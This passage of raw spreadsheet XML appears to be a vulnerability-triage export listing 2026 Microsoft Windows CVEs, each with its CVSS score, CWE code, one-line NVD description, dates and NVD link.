s="5" t="inlineStr" /><c r="M836" s="5" t="inlineStr" /><c r="N836" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O836" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P836" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q836" s="5" t="inlineStr" /><c r="R836" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S836" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T836" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t></is></c></row><row r="837"><c r="A837" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B837" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C837" s="5" t="inlineStr"><is><t>CVE-2026-69274</t></is></c><c r="D837" s="5" t="n"><v>7.1</v></c><c r="E837" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F837" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G837" s="5" t="inlineStr" /><c r="H837" s="5" t="n"><v>0.004</v></c><c r="I837" s="5" t="inlineStr" /><c r="J837" s="5" t="inlineStr" /><c r="K837" s="5" t="inlineStr" /><c r="L837" s="5" t="inlineStr" /><c r="M837" s="5" t="inlineStr" /><c r="N837" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O837" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P837" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q837" s="5" t="inlineStr" /><c r="R837" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S837" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T837" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t></is></c></row><row r="838"><c r="A838" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B838" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C838" s="5" t="inlineStr"><is><t>CVE-2026-69296</t></is></c><c r="D838" s="5" t="n"><v>7.1</v></c><c r="E838" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F838" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G838" s="5" t="inlineStr" /><c r="H838" s="5" t="n"><v>0.005</v></c><c r="I838" s="5" t="inlineStr" /><c r="J838" s="5" t="inlineStr" /><c r="K838" s="5" t="inlineStr" /><c r="L838" s="5" t="inlineStr" /><c r="M838" s="5" t="inlineStr" /><c r="N838" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O838" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P838" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q838" s="5" t="inlineStr" /><c r="R838" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S838" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T838" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t></is></c></row><row r="839"><c r="A839" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B839" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C839" s="5" t="inlineStr"><is><t>CVE-2026-69305</t></is></c><c r="D839" s="5" t="n"><v>7.1</v></c><c r="E839" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F839" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G839" s="5" t="inlineStr" /><c r="H839" s="5" t="n"><v>0.006</v></c><c r="I839" s="5" t="inlineStr" /><c r="J839" s="5" t="inlineStr" /><c r="K839" s="5" t="inlineStr" /><c r="L839" s="5" t="inlineStr" /><c r="M839" s="5" t="inlineStr" /><c r="N839" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O839" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P839" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q839" s="5" t="inlineStr" /><c r="R839" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S839" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T839" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t></is></c></row><row r="840"><c r="A840" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B840" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C840" s="5" t="inlineStr"><is><t>CVE-2026-69313</t></is></c><c r="D840" s="5" t="n"><v>7.1</v></c><c r="E840" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F840" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G840" s="5" t="inlineStr" /><c r="H840" s="5" t="n"><v>0.005</v></c><c r="I840" s="5" t="inlineStr" /><c r="J840" s="5" t="inlineStr" /><c r="K840" s="5" t="inlineStr" /><c r="L840" s="5" t="inlineStr" /><c r="M840" s="5" t="inlineStr" /><c r="N840" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O840" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P840" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q840" s="5" t="inlineStr" /><c r="R840" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S840" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T840" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t></is></c></row><row r="841"><c r="A841" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B841" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C841" s="5" t="inlineStr"><is><t>CVE-2026-69314</t></is></c><c r="D841" s="5" t="n"><v>7.1</v></c><c r="E841" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F841" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G841" s="5" t="inlineStr" /><c r="H841" s="5" t="n"><v>0.005</v></c><c r="I841" s="5" t="inlineStr" /><c r="J841" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K84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841" s="5" t="inlineStr" /><c r="M841" s="5" t="inlineStr" /><c r="N841" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O841" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P841" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q841" s="5" t="inlineStr" /><c r="R841" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S841" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T841" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t></is></c></row><row r="842"><c r="A842" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B842" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C842" s="5" t="inlineStr"><is><t>CVE-2026-69336</t></is></c><c r="D842" s="5" t="n"><v>7.1</v></c><c r="E842" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F842" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G842" s="5" t="inlineStr" /><c r="H842" s="5" t="n"><v>0.005</v></c><c r="I842" s="5" t="inlineStr" /><c r="J842" s="5" t="inlineStr" /><c r="K842" s="5" t="inlineStr" /><c r="L842" s="5" t="inlineStr" /><c r="M842" s="5" t="inlineStr" /><c r="N842" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O842" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P842" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q842" s="5" t="inlineStr" /><c r="R842" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S842" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T842" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t></is></c></row><row r="843"><c r="A843" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B843" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C843" s="5" t="inlineStr"><is><t>CVE-2026-69337</t></is></c><c r="D843" s="5" t="n"><v>7.1</v></c><c r="E843" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F843" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G843" s="5" t="inlineStr" /><c r="H843" s="5" t="n"><v>0.007</v></c><c r="I843" s="5" t="inlineStr" /><c r="J843" s="5" t="inlineStr" /><c r="K843" s="5" t="inlineStr" /><c r="L843" s="5" t="inlineStr" /><c r="M843" s="5" t="inlineStr" /><c r="N843" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O843" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P843" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q843" s="5" t="inlineStr" /><c r="R843" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S843" s="5" t="inlineStr"><is><t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T843" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t></is></c></row><row r="844"><c r="A844" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B844" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C844" s="5" t="inlineStr"><is><t>CVE-2026-69338</t></is></c><c r="D844" s="5" t="n"><v>7.1</v></c><c r="E844" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F844" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G844" s="5" t="inlineStr" /><c r="H844" s="5" t="n"><v>0.005</v></c><c r="I844" s="5" t="inlineStr" /><c r="J844" s="5" t="inlineStr" /><c r="K844" s="5" t="inlineStr" /><c r="L844" s="5" t="inlineStr" /><c r="M844" s="5" t="inlineStr" /><c r="N844" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O844" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P844" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q844" s="5" t="inlineStr" /><c r="R844" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S844" s="5" t="inlineStr"><is><t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T844" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t></is></c></row><row r="845"><c r="A845" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B845" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C845" s="5" t="inlineStr"><is><t>CVE-2026-69340</t></is></c><c r="D845" s="5" t="n"><v>7.1</v></c><c r="E845" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F845" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G845" s="5" t="inlineStr" /><c r="H845" s="5" t="n"><v>0.005</v></c><c r="I845" s="5" t="inlineStr" /><c r="J845" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K84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45" s="5" t="inlineStr" /><c r="M845" s="5" t="inlineStr" /><c r="N845" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O845" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P845" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q845" s="5" t="inlineStr" /><c r="R845" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S845" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T845" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t></is></c></row><row r="846"><c r="A846" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B846" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C846" s="5" t="inlineStr"><is><t>CVE-2026-69357</t></is></c><c r="D846" s="5" t="n"><v>7.1</v></c><c r="E846" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F846" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G846" s="5" t="inlineStr" /><c r="H846" s="5" t="n"><v>0.004</v></c><c r="I846" s="5" t="inlineStr" /><c r="J846" s="5" t="inlineStr" /><c r="K846" s="5" t="inlineStr" /><c r="L846" s="5" t="inlineStr" /><c r="M846" s="5" t="inlineStr" /><c r="N846" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O846" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P846" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q846" s="5" t="inlineStr" /><c r="R846" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S846" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T846" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t></is></c></row><row r="847"><c r="A847" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B847" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C847" s="5" t="inlineStr"><is><t>CVE-2026-69358</t></is></c><c r="D847" s="5" t="n"><v>7.1</v></c><c r="E847" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F847" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G847" s="5" t="inlineStr" /><c r="H847" s="5" t="n"><v>0.005</v></c><c r="I847" s="5" t="inlineStr" /><c r="J847" s="5" t="inlineStr" /><c r="K847" s="5" t="inlineStr" /><c r="L847" s="5" t="inlineStr" /><c r="M847" s="5" t="inlineStr" /><c r="N847" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O847" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P847" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q847" s="5" t="inlineStr" /><c r="R847" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S847" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="T847" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t></is></c></row><row r="848"><c r="A848" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B848" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C848" s="5" t="inlineStr"><is><t>CVE-2026-69364</t></is></c><c r="D848" s="5" t="n"><v>7.1</v></c><c r="E848" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F848" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G848" s="5" t="inlineStr" /><c r="H848" s="5" t="n"><v>0.005</v></c><c r="I848" s="5" t="inlineStr" /><c r="J848" s="5" t="inlineStr" /><c r="K848" s="5" t="inlineStr" /><c r="L848" s="5" t="inlineStr" /><c r="M848" s="5" t="inlineStr" /><c r="N848" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O848" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P848" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q848" s="5" t="inlineStr" /><c r="R848" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S848" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T848" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t></is></c></row><row r="849"><c r="A849" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B849" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C849" s="5" t="inlineStr"><is><t>CVE-2026-69366</t></is></c><c r="D849" s="5" t="n"><v>7.1</v></c><c r="E849" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F849" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G849" s="5" t="inlineStr" /><c r="H849" s="5" t="n"><v>0.006</v></c><c r="I849" s="5" t="inlineStr" /><c r="J849" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K84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49" s="5" t="inlineStr" /><c r="M849" s="5" t="inlineStr" /><c r="N849" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O849" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P849" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q849" s="5" t="inlineStr" /><c r="R849" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S849" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T849" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t></is></c></row><row r="850"><c r="A850" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B850" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C850" s="5" t="inlineStr"><is><t>CVE-2026-69384</t></is></c><c r="D850" s="5" t="n"><v>7.1</v></c><c r="E850" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F850" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G850" s="5" t="inlineStr" /><c r="H850" s="5" t="n"><v>0.004</v></c><c r="I850" s="5" t="inlineStr" /><c r="J850" s="5" t="inlineStr" /><c r="K850" s="5" t="inlineStr" /><c r="L850" s="5" t="inlineStr" /><c r="M850" s="5" t="inlineStr" /><c r="N850" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q850" s="5" t="inlineStr" /><c r="R850" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S850" s="5" t="inlineStr"><is><t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t></is></c><c r="T850" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t></is></c></row><row r="851"><c r="A851" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B851" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C851" s="5" t="inlineStr"><is><t>CVE-2026-69396</t></is></c><c r="D851" s="5" t="n"><v>7.1</v></c><c r="E851" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F851" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G851" s="5" t="inlineStr" /><c r="H851" s="5" t="n"><v>0.005</v></c><c r="I851" s="5" t="inlineStr" /><c r="J851" s="5" t="inlineStr" /><c r="K851" s="5" t="inlineStr" /><c r="L851" s="5" t="inlineStr" /><c r="M851" s="5" t="inlineStr" /><c r="N851" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O851" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P851" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q851" s="5" t="inlineStr" /><c r="R851" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S851" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T851" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t></is></c></row><row r="852"><c r="A852" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B852" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C852" s="5" t="inlineStr"><is><t>CVE-2026-69451</t></is></c><c r="D852" s="5" t="n"><v>7.1</v></c><c r="E852" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F852" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G852" s="5" t="inlineStr" /><c r="H852" s="5" t="n"><v>0.007</v></c><c r="I852" s="5" t="inlineStr" /><c r="J852" s="5" t="inlineStr" /><c r="K852" s="5" t="inlineStr" /><c r="L852" s="5" t="inlineStr" /><c r="M852" s="5" t="inlineStr" /><c r="N852" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O852" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P852" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q852" s="5" t="inlineStr" /><c r="R852" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S852" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T852" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t></is></c></row><row r="853"><c r="A853" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B853" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C853" s="5" t="inlineStr"><is><t>CVE-2026-69460</t></is></c><c r="D853" s="5" t="n"><v>7.1</v></c><c r="E853" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F853" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G853" s="5" t="inlineStr" /><c r="H853" s="5" t="n"><v>0.005</v></c><c r="I853" s="5" t="inlineStr" /><c r="J853" s="5" t="inlineStr" /><c r="K853" s="5" t="inlineStr" /><c r="L853" s="5" t="inlineStr" /><c r="M853" s="5" t="inlineStr" /><c r="N853" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O853" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P853" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q853" s="5" t="inlineStr" /><c r="R853" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S853" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T853" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t></is></c></row><row r="854"><c r="A854" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B854" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C854" s="5" t="inlineStr"><is><t>CVE-2026-69482</t></is></c><c r="D854" s="5" t="n"><v>7.1</v></c><c r="E854" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F854" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G854" s="5" t="inlineStr" /><c r="H854" s="5" t="n"><v>0.003</v></c><c r="I854" s="5" t="inlineStr" /><c r="J854" s="5" t="inlineStr" /><c r="K854" s="5" t="inlineStr" /><c r="L854" s="5" t="inlineStr" /><c r="M854" s="5" t="inlineStr" /><c r="N854" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O854" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P854" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q854" s="5" t="inlineStr" /><c r="R854" s="5" t="inlineStr"><is><t>CWE-379</t></is></c><c r="S854" s="5" t="inlineStr"><is><t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t></is></c><c r="T854" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t></is></c></row><row r="855"><c r="A855" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B855" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C855" s="5" t="inlineStr"><is><t>CVE-2026-69536</t></is></c><c r="D855" s="5" t="n"><v>7.1</v></c><c r="E855" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F855" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G855" s="5" t="inlineStr" /><c r="H855" s="5" t="n"><v>0.004</v></c><c r="I855" s="5" t="inlineStr" /><c r="J855" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K855" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L855" s="5" t="inlineStr" /><c r="M855" s="5" t="inlineStr" /><c r="N855" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O855" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P855" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q855" s="5" t="inlineStr" /><c r="R855" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S855" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T855" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t></is></c></row><row r="856"><c r="A856" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B856" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C856" s="5" t="inlineStr"><is><t>CVE-2026-69553</t></is></c><c r="D856" s="5" t="n"><v>7.1</v></c><c r="E856" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F856" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G856" s="5" t="inlineStr" /><c r="H856" s="5" t="n"><v>0.005</v></c><c r="I856" s="5" t="inlineStr" /><c r="J856" s="5" t="inlineStr" /><c r="K856" s="5" t="inlineStr" /><c r="L856" s="5" t="inlineStr" /><c r="M856" s="5" t="inlineStr" /><c r="N856" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O856" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P856" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q856" s="5" t="inlineStr" /><c r="R856" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S856" s="5" t="inlineStr"><is><t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T856" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t></is></c></row><row r="857"><c r="A857" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B857" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C857" s="5" t="inlineStr"><is><t>CVE-2026-69597</t></is></c><c r="D857" s="5" t="n"><v>7.1</v></c><c r="E857" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F857" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G857" s="5" t="inlineStr" /><c r="H857" s="5" t="n"><v>0.006</v></c><c r="I857" s="5" t="inlineStr" /><c r="J857" s="5" t="inlineStr" /><c r="K857" s="5" t="inlineStr" /><c r="L857" s="5" t="inlineStr" /><c r="M857" s="5" t="inlineStr" /><c r="N857" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O857" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P857" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q857" s="5" t="inlineStr" /><c r="R857" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S857" s="5" t="inlineStr"><is><t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T857" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t></is></c></row><row r="858"><c r="A858" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B858" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C858" s="5" t="inlineStr"><is><t>CVE-2026-69602</t></is></c><c r="D858" s="5" t="n"><v>7.1</v></c><c r="E858" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F858" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G858" s="5" t="inlineStr" /><c r="H858" s="5" t="n"><v>0.006</v></c><c r="I858" s="5" t="inlineStr" /><c r="J858" s="5" t="inlineStr" /><c r="K858" s="5" t="inlineStr" /><c r="L858" s="5" t="inlineStr" /><c r="M858" s="5" t="inlineStr" /><c r="N858" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O858" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P858" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q858" s="5" t="inlineStr" /><c r="R858" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S858" s="5" t="inlineStr"><is><t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T858" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t></is></c></row><row r="859"><c r="A859" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B859" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C859" s="5" t="inlineStr"><is><t>CVE-2026-69688</t></is></c><c r="D859" s="5" t="n"><v>7.1</v></c><c r="E859" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F859" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G859" s="5" t="inlineStr" /><c r="H859" s="5" t="n"><v>0.006</v></c><c r="I859" s="5" t="inlineStr" /><c r="J859" s="5" t="inlineStr" /><c r="K859" s="5" t="inlineStr" /><c r="L859" s="5" t="inlineStr" /><c r="M859" s="5" t="inlineStr" /><c r="N859" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O859" s="5" 